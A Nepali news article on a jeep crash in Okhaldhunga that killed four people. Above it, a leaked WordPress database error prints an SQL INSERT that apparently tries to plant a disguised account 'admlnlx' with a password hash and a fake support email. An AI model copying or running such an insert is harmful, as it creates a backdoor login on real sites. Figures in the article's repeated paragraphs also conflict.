WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BPQA9q6tPv1bcdQiNQd91CjKXxSr021', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 07:15:09', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । आज बिहान साढे ७ बजे ओखलढुंगाको सुनकोशी गाउँपालिका–९ काँडेभन्ज्याङ बुलडाँडामा जिप दुर्घटना हुँदा ४ जनाको ज्यान गएको छ ।
सुनकोशी गाउँपालिका च्यानमदेखि चम्पादेवी ककनी मन्दिरतर्फ गएको प्रदेश ३, ०१०२२ च ९६९४ नम्बरको जिप दुर्घटना हुँदा ३ जनाको जनाको घटनास्थलमै मृत्यु भएको हो र एक जनाको उपचारका लागि अस्पताल लैजाँदै गर्दा मृत्यु भएको हो ।
मृत्यु हुनेमा सिद्धिचरण नगरपालिका १० बेतेनीका ३५ वर्षीया मिठुमाया मगर, अन्दाजी १६ वर्षीया तुलसा मगर र उमेर नखुलेका खगेन्द्र मगरको घटनास्थलमै मृत्यु भएको जिल्ला प्रहरी कार्यालय ओखलढुंगाका डिएसपी गोविन्दराज काफ्लेले बताए ।सिद्धिचरण नगरपालिका १० कै शान्ता मगरको उपचारका लागि अस्पताल लैजाँदै गर्दा बाटोमै मृत्यु भएको हो । जिपमा १८ जना सवार थिए ।
गम्भीर घाइते ४ जना अञ्जु मगर, बुनुमाया मगर, रेजिना मगर सिनपा–१००, सुमन बोगटी सुनकोशी–७० लाई हेलिकेप्टरमार्फत उद्धार गरी काठमाडौंको ह्याम्स अस्पतालमा उपचार सुरु भएको छ । ५ जना घाइतेलाई सामुदायिक अस्पतालमा उपचारको लागि लगिएको प्रहरीले जनाएको छ ।
सुनकोशी गाउँपालिकाको च्यानमदेखि चम्पादेवी ककनी मन्दिरतर्फ गएको प्रदेश ३, ०१०२२ च ९६९४ नम्बरको जिप दुर्घटना हुँदा ३ जनाको मृत्यु भएको हो ।
दुर्घटनामा परेर घाइते भएका १३ जनामध्ये ४ जनाको अवस्था गम्भीर रहेको प्रहरीले जनाएको छ । उनीहरुलाई उपचारका लागि हेलिकोप्टरबाट काठमाडौं लाने तयारी भइरहेको डिएसपी काफ्लेले बताए । हेलिकप्टर काठमाडौंबाट उडिसकेको र केही मिनेटमै घटनास्थलमा अवतरण गर्ने उनले बताए ।